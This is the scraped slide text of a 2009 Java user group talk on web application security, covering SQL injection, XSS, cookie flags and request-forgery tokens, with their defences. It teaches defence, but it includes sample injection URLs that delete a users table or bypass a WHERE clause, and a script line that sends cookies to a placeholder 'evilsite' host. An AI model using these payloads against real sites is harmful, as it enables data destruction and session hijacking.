Download presentation
Presentation is loading. Please wait.
Published byMaurice Bennett Modified over 9 years ago
1
Twin Cities Java User Group Introduction to Writing Secure Web Applications March 9th, 2009 Jason Dean Minnesota Department of Health
2
Who am I? Web Application Developer with the Minnesota Department of Health (MDH) Chairperson and User Group Manager of the MDH ColdFusion User Group Web Development Blogger (http://www.12robots.com) Veteran of the U.S. Coast Guard
3
What is Application Security? Measures taken to prevent the exploitation of an application or the system that runs the application through defects in the design, development or deployment of the application
4
How do I know if my application is secure? If you have to ask, then it is not.
5
Make my application secure?
6
Assets Flash Files Images Servers System Files Databases Configuration Files
7
Threats The basics –Cross-Site Scripting XSS –Cookie Misuse/Exploits –SQL Injection –Request Forgeries (on-site and cross-site) –Input Validation Exploits –File Uploads The Advanced –Session Management Attacks –Authorization/Authentication –Access Control Attacks –Parameter Manipulation The less obvious Ignorance Assumptions Laziness Internal threats
8
Discover Vulnerabilities Code Review Scanners Release Source Attack Experts
9
Countermeasures Countermeasures mitigate attacks Out-Of-The-Box Custom Test and Retest Do not touch Certify
10
What are we going to talk about? The Basic: SQL Injection Cross-Site Scripting (XSS) Cookies Request Forgeries The less obvious: Ignorance Assumptions Laziness
11
Ignorance A long habit of not thinking a thing wrong gives it a superficial appearance of being right. - Thomas Paine
12
Assumptions about users Two things are infinite: the universe and human stupidity; and I'm not sure about the universe. - Albert Einstein
13
Assumptions About Hackers Why would a hacker have any interest in your site? Vandalism Identity Theft Activism Hackers will not use your site as you intend, either
14
Assumptions about administrator/host Configured correctly? Settings enabled? Work together to review configuration Control at the application level Hire an Expert
15
Assumptions about how the server/environment work Secret URLs Firewall Google Web Server Logs Internal Traffic Hidden Fields Javascript
16
Laziness Security Testing Code Review Learning Too Hard, Too much research Don't have enough time?
17
The Basic Threats SQL Injection Cross-Site Scripting XSS Cookie Misuse/Exploits Request Forgeries
18
SQL Injection Obtain, Change or Destroy Data Execute System Commands Easy to do Easy to stop Any DBMS
19
SQL Injection Examples String query = "SELECT * FROM users WHERE userid = " + userid; http://www.12robots.com/?userid=1303 URL, Form and Cookie parameters can be used as part of a SQL statement. Would probably be used in a query like this:
20
SQL Injection Examples www.12robots.com/?userid=1303 http://www.12robots.com/?userid=1303;+DELETE+FROM+users;-- Would Become
21
SQL Injection Examples (cont) http://www.12robots.com/?userid=1303;+DELETE+FROM+users;-- SELECT username, firstname FROM users WHERE userid = 1303; DELETE FROM customers;-- Would result in this query
22
SQL Injection Examples (cont) http://www.12robots.com/?userid=1303%20OR%201=1;-- SELECT username, firstname FROM users WHERE userid = 1303 OR 1=1;-- Would result in this query
23
Stopping SQL Injection Example http://www.12robots.com/?username=Jason&password=myPass I know we don’t send passwords in the URL, this is a demo, this would work just as well in a form field http://www.12robots.com/?username=Jason'-&password=noPass SELECT username, firstname FROM users WHERE username = 'jason'-- ' AND password = ‘myPass’ SELECT username, firstname FROM users WHERE username = 'jason''-- ' AND password = 'myPass' So if you had a URL for login in that looked like And a hacker tried to inject a single quote and double-dash If you did not have a parameterized query, you'd get hacked But with a parameterized query, you'd be safe
24
Prepared Statements in Action ColdFusion on an Integer OR on an String SELECT username, firstname FROM users WHERE userid = SELECT username, firstname FROM users WHERE userid =
25
Prepared Statements in Action Java Prepare a string: Prepare an Integer: String query = "SELECT id, fname, lname FROM authors WHERE fname = ? and lname = ?"; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setString( 1, fname ); pstmt.setString( 2, lname ); ResultSet results = pstmt.execute( ); String query = "SELECT id, fname, lname FROM authors WHERE id = ?”; PreparedStatement pstmt = connection.prepareStatement( query ); pstmt.setInt( 1, id ); ResultSet results = pstmt.execute( );
26
Prepared Statements in Action C# Prepare a string: IDbCommand cmdUserInputText = conn.CreateCommand(); cmdUserInputText.CommandType= System.Data.CommandType.Text; cmdUserInputText.CommandText = "SELECT * FROM titles WHERE title_id=@title_id"; IDbDataParameter userParam = cmdUserInputText.CreateParameter(); userParam.Value = "myTitleID"; userParam.DbType = System.Data.DbType.String; cmdUserInputText.Parameters.Add(userParam);
27
Prepared Statements in Action PHP with MySQLi Prepare an Integer: Prepare a String $db_conn = new mysqli("localhost", "user", "pass", "db"); $statement = $db_conn->prepare("SELECT username FROM users WHERE id = ?"); $statement->bind_param("i", $id); $statement->execute(); $db_conn = new mysqli("localhost", "user", "pass", "db"); $statement = $db_conn->prepare("SELECT id FROM users WHERE username = ?"); $statement->bind_param("s", $username); $statement->execute();
28
What about other Dynamic Elements in SQL? SELECT username, firstname FROM users ORDER BY username #sortOrder# SELECT username, firstname FROM users ORDER BY username ASC DESC
29
Cross-Site Scripting (XSS) Injection Attack One user attacks another Many uses Any user input Usually JavaScript
30
XSS Example You have a comments text box, like so: And some joker decides to inject some Javascript: Then when someone views the page that displays that comment, they get:
31
XSS Uses document.location=”http://www.evilsite.com?cookie=” + document.cookie;
32
XSS iFrame Example When another user views the output of that comment later, they will see a form prompting for their user/pass, if they enter and hit “submit” the form will be posted to the evil site.
33
XSS Prevention So how do we protect against this type of attack? Turn on script protection (ColdFusion) Use character encoding functions on all dynamic output User Input validation Use a security API or Framework for your specific language
34
Character Encoding alert('Hacked!'); <script type=”text/javascript”>alert('Hacked!');</script> This: This is Bold Text Would become: This is <strong>Bold Text</strong> And when displayed:This is Bold Text Instead of like: This is Bold Text
35
Character Encoding Function ColdFusion Java Java ESAPI PHP C# import org.w3c.tidy.servlet.util.HTMLEncode //jTidy encode(String); #HTMLEncodedFormat(String)# ESAPI.encoder().encodeForHTML(String); Server.HtmlEncode(String);
36
Cookie Security
37
Cookie Parameters Name Value Expires Path Domain Secure HTTPOnly
38
Cookie Domain and Path www.awesomebloggers.com 12robots.awesomebloggers.com domain=”.awesomebloggers.com” hacker.awesomebloggers.com domain=”.12robots.awesomebloggers.com” www.awesomebloggers.com/12robots Path=”/” www.awesomeblogers.com/hacker path=”/12robots”
39
Setting the HTTPOnly Flag response.setHeader("Set-Cookie", "name=value; HTTPOnly"); HttpCookie myCookie = new HttpCookie("myCookie"); myCookie.HttpOnly = true; Response.AppendCookie(myCookie); ColdFusion Java PHP C#
40
What is a Request Forgery? A request forgery, also sometimes called a Cross-Site (or On-Site) Request Forgery(XSRF), is an attack that is perpetrated against the user of a site who has authenticated access to that site
41
That was confusing How about an Example? Delete page/function single parameter PageID Admin Only All is good, right?
42
What happened?
43
So what can we do about it? It probably: Receives the request Checks to make sure the user is logged in Confirms that the ID is valid Performs the action
44
How do we fix it? //pseudo-code session.add(“key”, createUUID()); session.add(“keyExpires”, DateAdd('m', 10, Now());
45
How do we fix it? Pseudo-code If (exists(sessionkey) && exists(formkey) && !(isExpired(formKey, keyExpires)) && sessionkey == formKey) { //Delete the key from the session so it can't be reused delete(sessionkey); } else { //Relocate the request if the key is not present or doesn't match log(securityInfo); request.location(webroot); //or throw an Exception } //Finish Processing the request
46
Questions? Please ask your questions now Comments? Jason Dean jason@12robots.com http://www.12robots.com
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.